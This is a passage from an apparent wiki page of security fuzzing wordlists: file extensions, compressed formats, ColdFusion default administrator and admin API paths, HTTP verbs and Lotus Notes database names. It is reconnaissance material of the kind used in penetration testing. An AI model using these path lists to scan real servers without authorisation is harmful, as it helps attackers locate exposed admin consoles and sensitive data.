.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
